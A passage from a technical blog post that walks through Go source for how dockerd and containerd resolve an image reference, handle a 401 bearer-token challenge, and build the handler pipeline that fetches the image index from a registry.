    <span class="n">name</span><span class="p">,</span> <span class="n">desc</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">rCtx</span><span class="p">.</span><span class="n">Resolver</span><span class="p">.</span><span class="n">Resolve</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">ref</span><span class="p">)</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">desc</code> is the <code class="language-plaintext highlighter-rouge">Descriptor</code> object, which describes a media resource. This structure is important because it not only helps you understand the standard for describing a container, but also <strong>contains the information about external resources</strong>, which may be attacker-controllable.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/opencontainers/image-spec/specs-go/v1/descriptor.go</span>
<span class="k">type</span> <span class="n">Descriptor</span> <span class="k">struct</span> <span class="p">{</span>
    <span class="n">MediaType</span> <span class="kt">string</span> <span class="s">`json:"mediaType"`</span>
    <span class="n">Digest</span> <span class="n">digest</span><span class="o">.</span><span class="n">Digest</span> <span class="s">`json:"digest"`</span>
    <span class="n">Size</span> <span class="kt">int64</span> <span class="s">`json:"size"`</span>
    <span class="n">URLs</span> <span class="p">[]</span><span class="kt">string</span> <span class="s">`json:"urls,omitempty"`</span>
    <span class="n">Annotations</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="kt">string</span> <span class="s">`json:"annotations,omitempty"`</span>
    <span class="n">Data</span> <span class="p">[]</span><span class="kt">byte</span> <span class="s">`json:"data,omitempty"`</span>
    <span class="n">Platform</span> <span class="o">*</span><span class="n">Platform</span> <span class="s">`json:"platform,omitempty"`</span>
    <span class="n">ArtifactType</span> <span class="kt">string</span> <span class="s">`json:"artifactType,omitempty"`</span>
<span class="p">}</span>
</code></pre></div></div>

<p>How does <code class="language-plaintext highlighter-rouge">Resolve()</code> return a descriptor? It first gets the registry host based on the reference name [6], then decides which built-in paths to use [7]. It then iterates over the paths and hosts, constructing a HEAD request to the remote registry [8] and sending it [9] with a retry mechanism.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/remotes/docker/resolver.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">r</span> <span class="o">*</span><span class="n">dockerResolver</span><span class="p">)</span> <span class="n">Resolve</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">ref</span> <span class="kt">string</span><span class="p">)</span> <span class="p">(</span><span class="kt">string</span><span class="p">,</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">/**
     * resolveDockerBase() -&gt; r.base(refspec) -&gt; r.hosts(host) -&gt; RegistryHosts(host)
     * base = { schema: "https", host: "registry-1.docker.io", ... }
     */</span>
    <span class="n">base</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">r</span><span class="o">.</span><span class="n">resolveDockerBase</span><span class="p">(</span><span class="n">ref</span><span class="p">)</span> <span class="c">// [6]</span>
    <span class="c">// [...]</span>
    <span class="k">else</span> <span class="p">{</span>
        <span class="n">paths</span> <span class="o">=</span> <span class="nb">append</span><span class="p">(</span><span class="n">paths</span><span class="p">,</span> <span class="p">[]</span><span class="kt">string</span><span class="p">{</span><span class="s">"manifests"</span><span class="p">,</span> <span class="n">refspec</span><span class="o">.</span><span class="n">Object</span><span class="p">})</span> <span class="c">// [7]</span>
        <span class="n">caps</span> <span class="o">|=</span> <span class="n">HostCapabilityResolve</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="n">hosts</span> <span class="o">:=</span> <span class="n">base</span><span class="o">.</span><span class="n">filterHosts</span><span class="p">(</span><span class="n">caps</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="k">for</span> <span class="n">_</span><span class="p">,</span> <span class="n">u</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">paths</span> <span class="p">{</span> <span class="c">// [5]</span>
        <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">host</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">hosts</span> <span class="p">{</span>
            <span class="n">req</span> <span class="o">:=</span> <span class="n">base</span><span class="o">.</span><span class="n">request</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">http</span><span class="o">.</span><span class="n">MethodHead</span><span class="p">,</span> <span class="n">u</span><span class="o">...</span><span class="p">)</span> <span class="c">// [8]</span>
            <span class="c">// [...]</span>
            <span class="n">resp</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">req</span><span class="o">.</span><span class="n">doWithRetries</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="no">true</span><span class="p">)</span> <span class="c">// [9], HEAD "registry-1.docker.io/manifests"</span>
            <span class="c">// [...]</span>
        <span class="p">}</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">doWithRetries()</code> internally calls <code class="language-plaintext highlighter-rouge">r.do()</code>, which tries to send the request [10] and checks whether the request needs to be sent again [11].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/remotes/docker/resolver.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">r</span> <span class="o">*</span><span class="n">request</span><span class="p">)</span> <span class="n">doWithRetries</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">lastHost</span> <span class="kt">bool</span><span class="p">,</span> <span class="n">checks</span> <span class="o">...</span><span class="n">doChecks</span><span class="p">)</span> <span class="p">(</span><span class="n">resp</span> <span class="o">*</span><span class="n">http</span><span class="o">.</span><span class="n">Response</span><span class="p">,</span> <span class="n">err</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">resp</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">r</span><span class="o">.</span><span class="n">doWithRetriesInner</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="no">nil</span><span class="p">,</span> <span class="n">lastHost</span><span class="p">)</span> <span class="c">// &lt;--------</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">resp</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">r</span> <span class="o">*</span><span class="n">request</span><span class="p">)</span> <span class="n">doWithRetriesInner</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">responses</span> <span class="p">[]</span><span class="o">*</span><span class="n">http</span><span class="o">.</span><span class="n">Response</span><span class="p">,</span> <span class="n">lastHost</span> <span class="kt">bool</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">http</span><span class="o">.</span><span class="n">Response</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">resp</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">r</span><span class="o">.</span><span class="n">do</span><span class="p">(</span><span class="n">ctx</span><span class="p">)</span> <span class="c">// [10]</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
        <span class="k">return</span> <span class="no">nil</span><span class="p">,</span> <span class="n">err</span>
    <span class="p">}</span>

    <span class="n">responses</span> <span class="o">=</span> <span class="nb">append</span><span class="p">(</span><span class="n">responses</span><span class="p">,</span> <span class="n">resp</span><span class="p">)</span>
    <span class="n">retry</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">r</span><span class="o">.</span><span class="n">retryRequest</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">responses</span><span class="p">,</span> <span class="n">lastHost</span><span class="p">)</span> <span class="c">// [11]</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">retry</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="k">return</span> <span class="n">r</span><span class="o">.</span><span class="n">doWithRetriesInner</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">responses</span><span class="p">,</span> <span class="n">lastHost</span><span class="p">)</span> <span class="c">// call itself again if retry == true</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>If the status code of the HTTP response is 401 [12], the authorizer registers a new auth handler [13] based on the authenication information extracted from response header.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/remotes/docker/resolver.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">r</span> <span class="o">*</span><span class="n">request</span><span class="p">)</span> <span class="n">retryRequest</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">responses</span> <span class="p">[]</span><span class="o">*</span><span class="n">http</span><span class="o">.</span><span class="n">Response</span><span class="p">,</span> <span class="n">lastHost</span> <span class="kt">bool</span><span class="p">)</span> <span class="p">(</span><span class="kt">bool</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">last</span> <span class="o">:=</span> <span class="n">responses</span><span class="p">[</span><span class="nb">len</span><span class="p">(</span><span class="n">responses</span><span class="p">)</span><span class="o">-</span><span class="m">1</span><span class="p">]</span>
    <span class="k">switch</span> <span class="n">last</span><span class="o">.</span><span class="n">StatusCode</span> <span class="p">{</span>
    <span class="k">case</span> <span class="n">http</span><span class="o">.</span><span class="n">StatusUnauthorized</span><span class="o">:</span> <span class="c">// [12]</span>
        <span class="c">// [...]</span>
        <span class="k">if</span> <span class="n">r</span><span class="o">.</span><span class="n">host</span><span class="o">.</span><span class="n">Authorizer</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
            <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">r</span><span class="o">.</span><span class="n">host</span><span class="o">.</span><span class="n">Authorizer</span><span class="o">.</span><span class="n">AddResponses</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">responses</span><span class="p">);</span> <span class="n">err</span> <span class="o">==</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// &lt;--------</span>
                <span class="no">true</span><span class="p">,</span> <span class="no">nil</span> <span class="c">// true -&gt; retry</span>
            <span class="p">}</span>
            <span class="c">// [...]</span>
        <span class="p">}</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c">// vendor/github.com/containerd/containerd/v2/core/remotes/docker/authorizer.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">a</span> <span class="o">*</span><span class="n">dockerAuthorizer</span><span class="p">)</span> <span class="n">AddResponses</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">responses</span> <span class="p">[]</span><span class="o">*</span><span class="n">http</span><span class="o">.</span><span class="n">Response</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="k">for</span> <span class="n">_</span><span class="p">,</span> <span class="n">c</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">auth</span><span class="o">.</span><span class="n">ParseAuthHeader</span><span class="p">(</span><span class="n">last</span><span class="o">.</span><span class="n">Header</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">if</span> <span class="n">c</span><span class="o">.</span><span class="n">Scheme</span> <span class="o">==</span> <span class="n">auth</span><span class="o">.</span><span class="n">BearerAuth</span> <span class="p">{</span>
            <span class="c">/**
             * the response header is like:
             * www-authenticate: Bearer realm="https://auth.docker.io/token",service="registry.docker.io",scope="repository:library/ubuntu:pull"
             * so next time authorizer will first do authorization and then send the request
             */</span>
            <span class="c">// [...]</span>
            <span class="n">a</span><span class="o">.</span><span class="n">handlers</span><span class="p">[</span><span class="n">host</span><span class="p">]</span> <span class="o">=</span> <span class="n">newAuthHandler</span><span class="p">(</span><span class="n">a</span><span class="o">.</span><span class="n">client</span><span class="p">,</span> <span class="n">a</span><span class="o">.</span><span class="n">header</span><span class="p">,</span> <span class="n">c</span><span class="o">.</span><span class="n">Scheme</span><span class="p">,</span> <span class="n">common</span><span class="p">)</span> <span class="c">// [13]</span>
            <span class="k">return</span> <span class="no">nil</span>
        <span class="p">}</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Since <code class="language-plaintext highlighter-rouge">retry</code> is equal to true, <code class="language-plaintext highlighter-rouge">r.do(ctx)</code> is called again. This time the auth handler is assigned, so it has to authorize against the realm host, <code class="language-plaintext highlighter-rouge">auth.docker.io</code> in this case, to get the auth token. Here, the Bearer authentication is used [14].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/remotes/docker/resolver.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">r</span> <span class="o">*</span><span class="n">request</span><span class="p">)</span> <span class="n">do</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">http</span><span class="o">.</span><span class="n">Response</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">r</span><span class="o">.</span><span class="n">authorize</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">req</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// &lt;--------</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="n">resp</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">client</span><span class="o">.</span><span class="n">Do</span><span class="p">(</span><span class="n">req</span><span class="p">)</span> <span class="c">// actually send the request</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">r</span> <span class="o">*</span><span class="n">request</span><span class="p">)</span> <span class="n">authorize</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">req</span> <span class="o">*</span><span class="n">http</span><span class="o">.</span><span class="n">Request</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="k">if</span> <span class="n">r</span><span class="o">.</span><span class="n">host</span><span class="o">.</span><span class="n">Authorizer</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
        <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">r</span><span class="o">.</span><span class="n">host</span><span class="o">.</span><span class="n">Authorizer</span><span class="o">.</span><span class="n">Authorize</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">req</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// &lt;--------</span>
            <span class="c">// [...]</span>
        <span class="p">}</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="no">nil</span>
<span class="p">}</span>

<span class="c">// vendor/github.com/containerd/containerd/v2/core/remotes/docker/authorizer.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">a</span> <span class="o">*</span><span class="n">dockerAuthorizer</span><span class="p">)</span> <span class="n">Authorize</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">req</span> <span class="o">*</span><span class="n">http</span><span class="o">.</span><span class="n">Request</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">ah</span> <span class="o">:=</span> <span class="n">a</span><span class="o">.</span><span class="n">getAuthHandler</span><span class="p">(</span><span class="n">req</span><span class="o">.</span><span class="n">URL</span><span class="o">.</span><span class="n">Host</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="n">auth</span><span class="p">,</span> <span class="n">refreshToken</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">ah</span><span class="o">.</span><span class="n">authorize</span><span class="p">(</span><span class="n">ctx</span><span class="p">)</span> <span class="c">// &lt;--------</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">ah</span> <span class="o">*</span><span class="n">authHandler</span><span class="p">)</span> <span class="n">authorize</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="p">(</span><span class="kt">string</span><span class="p">,</span> <span class="kt">string</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">switch</span> <span class="n">ah</span><span class="o">.</span><span class="n">scheme</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">case</span> <span class="n">auth</span><span class="o">.</span><span class="n">BearerAuth</span><span class="o">:</span>
        <span class="k">return</span> <span class="n">ah</span><span class="o">.</span><span class="n">doBearerAuth</span><span class="p">(</span><span class="n">ctx</span><span class="p">)</span> <span class="c">// [14]</span>
    <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">req.doWithRetries()</code> returns the HTTP response data to its caller, <code class="language-plaintext highlighter-rouge">Resolve()</code>, and the <strong><code class="language-plaintext highlighter-rouge">"Docker-Content-Digest"</code> header is extracted</strong> [15] from the headers. In the end, the <code class="language-plaintext highlighter-rouge">Resolve()</code> wraps the response data into a descriptor [16] and returns.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/remotes/docker/resolver.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">r</span> <span class="o">*</span><span class="n">dockerResolver</span><span class="p">)</span> <span class="n">Resolve</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">ref</span> <span class="kt">string</span><span class="p">)</span> <span class="p">(</span><span class="kt">string</span><span class="p">,</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">for</span> <span class="n">_</span><span class="p">,</span> <span class="n">u</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">paths</span> <span class="p">{</span>
        <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">host</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">hosts</span> <span class="p">{</span>
            <span class="c">// [...]</span>
            <span class="n">resp</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">req</span><span class="o">.</span><span class="n">doWithRetries</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">i</span> <span class="o">==</span> <span class="nb">len</span><span class="p">(</span><span class="n">hosts</span><span class="p">)</span><span class="o">-</span><span class="m">1</span><span class="p">)</span>
            <span class="k">if</span> <span class="n">dgst</span> <span class="o">==</span> <span class="s">""</span> <span class="p">{</span>
                <span class="n">dgstHeader</span> <span class="o">:=</span> <span class="n">digest</span><span class="o">.</span><span class="n">Digest</span><span class="p">(</span><span class="n">resp</span><span class="o">.</span><span class="n">Header</span><span class="o">.</span><span class="n">Get</span><span class="p">(</span><span class="s">"Docker-Content-Digest"</span><span class="p">))</span> <span class="c">// [15]</span>
                <span class="n">dgst</span> <span class="o">=</span> <span class="n">dgstHeader</span>
            <span class="p">}</span>
            <span class="c">// [...]</span>
            <span class="n">desc</span> <span class="o">:=</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">{</span> <span class="c">// [16], for ubuntu:24.04</span>
                <span class="n">Digest</span><span class="o">:</span>    <span class="n">dgst</span><span class="p">,</span>        <span class="c">// "sha256:c4a8d5503dfb2a3eb8ab5f807da5bc69a85730fb49b5cfca2330194ebcc41c7b"</span>
                <span class="n">MediaType</span><span class="o">:</span> <span class="n">contentType</span><span class="p">,</span> <span class="c">// "application/vnd.oci.image.index.v1+json"</span>
                <span class="n">Size</span><span class="o">:</span>      <span class="n">size</span><span class="p">,</span>        <span class="c">// 6688</span>
            <span class="p">}</span>
            <span class="k">return</span> <span class="n">ref</span><span class="p">,</span> <span class="n">desc</span><span class="p">,</span> <span class="no">nil</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Now we know how <code class="language-plaintext highlighter-rouge">dockerd</code> handles the response if the registry server returns 401, and what the first request looks like when you are pulling a image.</p>

<p>The flow is as follows:</p>

<p><img src="/assets/image-20260601000000001.png" alt="image-20260601000000001" style="display: block; margin-left: auto; margin-right: auto; zoom:50%;" /></p>

<h3 id="13-get-image-index">1.3. GET Image Index</h3>

<p>Once we get the first descriptor, we can start to <strong>fetch the raw data</strong> from the registry server.</p>

<p>The fetching pipeline is built in two layers: <strong>handlers</strong> and <strong>decorators</strong>. A handler works as a hook function [1], and a handler may have several decorators. For example <code class="language-plaintext highlighter-rouge">childrenHandler</code> has at most five decorators [2], all chained together into the final handler.</p>

<p>When <code class="language-plaintext highlighter-rouge">images.Dispatch()</code> [3] is called, the handlers are invoked following the sequence of registration.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/client/pull.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">Client</span><span class="p">)</span> <span class="n">fetch</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">rCtx</span> <span class="o">*</span><span class="n">RemoteContext</span><span class="p">,</span> <span class="n">ref</span> <span class="kt">string</span><span class="p">,</span> <span class="n">limit</span> <span class="kt">int</span><span class="p">)</span> <span class="p">(</span><span class="n">images</span><span class="o">.</span><span class="n">Image</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">name</span><span class="p">,</span> <span class="n">desc</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">rCtx</span><span class="o">.</span><span class="n">Resolver</span><span class="o">.</span><span class="n">Resolve</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">ref</span><span class="p">)</span>
    <span class="c">// returned desc = { Digest: sha256:c4a8...1c7b, MediaType: &lt;type&gt;, Size: N }</span>
    <span class="c">// [...]</span>
    
    <span class="c">// ============ fetching pipeline ============</span>
    <span class="n">store</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">ContentStore</span><span class="p">()</span>
    <span class="c">// [...]</span>
    <span class="n">fetcher</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">rCtx</span><span class="o">.</span><span class="n">Resolver</span><span class="o">.</span><span class="n">Fetcher</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">name</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="n">childrenHandler</span> <span class="o">:=</span> <span class="n">images</span><span class="o">.</span><span class="n">ChildrenHandler</span><span class="p">(</span><span class="n">store</span><span class="p">)</span>
    
    <span class="c">// [...]</span>
    <span class="c">// [2]</span>
    <span class="n">childrenHandler</span> <span class="o">=</span> <span class="n">images</span><span class="o">.</span><span class="n">SetReferrers</span><span class="p">(</span><span class="n">rCtx</span><span class="o">.</span><span class="n">ReferrersProvider</span><span class="p">,</span> <span class="n">childrenHandler</span><span class="p">)</span>
    <span class="n">childrenHandler</span> <span class="o">=</span> <span class="n">images</span><span class="o">.</span><span class="n">SetChildrenMappedLabels</span><span class="p">(</span><span class="n">store</span><span class="p">,</span> <span class="n">childrenHandler</span><span class="p">,</span> <span class="n">rCtx</span><span class="o">.</span><span class="n">ChildLabelMap</span><span class="p">)</span>
    <span class="n">childrenHandler</span> <span class="o">=</span> <span class="n">remotes</span><span class="o">.</span><span class="n">FilterManifestByPlatformHandler</span><span class="p">(</span><span class="n">childrenHandler</span><span class="p">,</span> <span class="n">rCtx</span><span class="o">.</span><span class="n">PlatformMatcher</span><span class="p">)</span>
    <span class="n">childrenHandler</span> <span class="o">=</span> <span class="n">images</span><span class="o">.</span><span class="n">FilterPlatforms</span><span class="p">(</span><span class="n">childrenHandler</span><span class="p">,</span> <span class="n">rCtx</span><span class="o">.</span><span class="n">PlatformMatcher</span><span class="p">)</span>
    <span class="n">childrenHandler</span> <span class="o">=</span> <span class="n">images</span><span class="o">.</span><span class="n">LimitManifests</span><span class="p">(</span><span class="n">childrenHandler</span><span class="p">,</span> <span class="n">rCtx</span><span class="o">.</span><span class="n">PlatformMatcher</span><span class="p">,</span> <span class="n">limit</span><span class="p">)</span>

    <span class="c">// [...]</span>
    <span class="n">convertibleHandler</span> <span class="o">:=</span> <span class="n">images</span><span class="o">.</span><span class="n">HandlerFunc</span><span class="p">(</span>
        <span class="k">func</span><span class="p">(</span><span class="n">_</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">desc</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">)</span> <span class="p">([]</span><span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
            <span class="k">if</span> <span class="n">desc</span><span class="o">.</span><span class="n">MediaType</span> <span class="o">==</span> <span class="n">docker</span><span class="o">.</span><span class="n">LegacyConfigMediaType</span> <span class="p">{</span>
                <span class="n">isConvertible</span> <span class="o">=</span> <span class="no">true</span>
            <span class="p">}</span>

            <span class="k">return</span> <span class="p">[]</span><span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">{},</span> <span class="no">nil</span>
        <span class="p">},</span>
    <span class="p">)</span>

    <span class="c">// [...]</span>
    <span class="n">appendDistSrcLabelHandler</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">docker</span><span class="o">.</span><span class="n">AppendDistributionSourceLabel</span><span class="p">(</span><span class="n">store</span><span class="p">,</span> <span class="n">ref</span><span class="p">)</span>

    <span class="c">// [...]</span>
    <span class="n">handlers</span> <span class="o">:=</span> <span class="nb">append</span><span class="p">(</span> <span class="c">// [1]</span>
        <span class="n">rCtx</span><span class="o">.</span><span class="n">BaseHandlers</span><span class="p">,</span>
        <span class="n">remotes</span><span class="o">.</span><span class="n">FetchHandler</span><span class="p">(</span><span class="n">store</span><span class="p">,</span> <span class="n">fetcher</span><span class="p">),</span>
        <span class="n">convertibleHandler</span><span class="p">,</span>
        <span class="n">childrenHandler</span><span class="p">,</span>
        <span class="n">appendDistSrcLabelHandler</span><span class="p">,</span>
    <span class="p">)</span>
    <span class="n">handler</span> <span class="o">=</span> <span class="n">images</span><span class="o">.</span><span class="n">Handlers</span><span class="p">(</span><span class="n">handlers</span><span class="o">...</span><span class="p">)</span>
    
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">images</span><span class="o">.</span><span class="n">Dispatch</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">handler</span><span class="p">,</span> <span class="n">limiter</span><span class="p">,</span> <span class="n">desc</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [3]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">Dispatch()</code> calls <code class="language-plaintext highlighter-rouge">handler.Handle()</code> to walk through the chained handlers and invoke them [4]. If the composed handler returns more descriptors, <code class="language-plaintext highlighter-rouge">Dispatch()</code> is called recursively [5].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/images/handlers.go</span>
<span class="k">func</span> <span class="n">Dispatch</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">handler</span> <span class="n">Handler</span><span class="p">,</span> <span class="n">limiter</span> <span class="o">*</span><span class="n">semaphore</span><span class="o">.</span><span class="n">Weighted</span><span class="p">,</span> <span class="n">descs</span> <span class="o">...</span><span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="k">for</span> <span class="n">_</span><span class="p">,</span> <span class="n">desc</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">descs</span> <span class="p">{</span>
        <span class="n">eg</span><span class="o">.</span><span class="n">Go</span><span class="p">(</span><span class="k">func</span><span class="p">()</span> <span class="kt">error</span> <span class="p">{</span>
            <span class="n">desc</span> <span class="o">:=</span> <span class="n">desc</span>
            <span class="c">// [...]</span>
            <span class="c">// .Handle() is defined in vendor/github.com/containerd/containerd/v2/core/images/handlers.go</span>
            <span class="n">children</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">handler</span><span class="o">.</span><span class="n">Handle</span><span class="p">(</span><span class="n">ctx2</span><span class="p">,</span> <span class="n">desc</span><span class="p">)</span> <span class="c">// [4]</span>
            <span class="c">// [...]</span>
